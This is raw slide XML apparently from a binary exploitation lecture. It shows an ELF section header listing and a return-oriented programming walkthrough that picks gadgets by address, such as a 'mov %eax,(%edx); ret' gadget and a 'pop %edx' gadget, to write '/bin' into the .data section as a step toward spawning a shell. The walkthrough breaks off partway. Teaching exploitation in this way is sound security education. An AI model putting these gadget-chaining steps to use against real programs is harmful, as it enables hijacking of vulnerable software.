                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rel.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          REL             08048138 000138 000070 08   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   5  4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[ 4] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080481a8 0001a8 000023 00  AX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[ 5] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080481d0 0001d0 0000e0 00  AX  0   0 16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[ 6] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080482b0 0002b0 075b04 00  AX  0   0 16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[ 7] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_fn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080bddc0 075dc0 000b36 00  AX  0   0 16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[ 8] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_fre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080be900 076900 000076 00  AX  0   0 16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[ 9] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080be978 076978 000014 00  AX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[10] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           PROGBITS        080be9a0 0769a0 01bf90 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0 32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[11] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_subfreeres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da930 092930 00002c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[12] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_atexit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>     PROGBITS        080da95c 09295c 000004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[13] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_thread_sub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080da960 092960 000004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[14] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eh_frame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         PROGBITS        080da964 092964 00e108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[15] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc_except_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> PROGBITS        080e8a6c 0a0a6c 0000a3 00   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  0   0  1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[16] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            PROGBITS        080e9f58 0a0f58 000010 00 WAT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[17] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             NOBITS          080e9f68 0a0f68 000018 00 WAT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[18] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       INIT_ARRAY      080e9f68 0a0f68 000008 00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[19] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       FINI_ARRAY      080e9f70 0a0f70 000008 00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[20] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jcr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9f78 0a0f78 000004 00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[21] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data.rel.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      PROGBITS        080e9f80 0a0f80 000070 00  WA  0   0 32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[22] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9ff0 0a0ff0 000008 04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[23] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        080ea000 0a1000 000044 04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[24] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080ea060 0a1060 000f20 00  WA  0   0 32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[25] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              NOBITS          080eaf80 0a1f80 00136c 00  WA  0   0 32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[26] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOBITS          080ec2ec 0a1f80 000018 00  WA  0   0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[27] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        00000000 0a1f80 00002b 01  MS  0   0  1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[28] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shstrtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         STRTAB          00000000 0a1fab 00014c 00      0   0  1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[29] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>symtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           SYMTAB          00000000 0a25d0 008b70 10     30 1055  4  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[30] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           STRTAB          00000000 0ab140 007eac 00      0   0  1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161617" y="5216055"/>
            <a:ext cx="8203155" cy="190831"/>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694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20" end="2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22" end="22"/>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23" end="23"/>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24" end="2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25" end="2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26" end="26"/>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27" end="27"/>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
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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29" end="29"/>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
                                            <p:txEl>
                                              <p:pRg st="30" end="30"/>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31" end="31"/>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
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to find a gadget that will write some data to a location then return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After much searching:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67d:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>89 02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</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mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will copy whatever’s in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> into the memory location that %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> points to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So, if we have %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be the data "/bin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>And %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be &amp;.data (0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080ea060</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Then, we will have /bin at a fixed memory location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Need more gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167427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a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>5a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
